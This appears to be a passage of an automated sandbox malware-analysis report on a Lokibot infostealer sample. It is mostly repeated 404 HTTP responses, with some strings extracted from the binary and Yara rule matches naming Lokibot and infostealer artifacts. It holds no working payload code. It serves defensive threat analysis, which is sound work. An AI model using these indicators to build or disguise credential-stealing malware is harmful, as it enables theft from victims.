Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:45:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 06:46:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Source: YvVDV4cbjy.exe, HxQXdrrQ.exe.0.dr	String found in binary or memory: http://localhost/calculator_server/requests.php
Source: YvVDV4cbjy.exe, 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, HxQXdrrQ.exe, 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HxQXdrrQ.exe, HxQXdrrQ.exe, 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
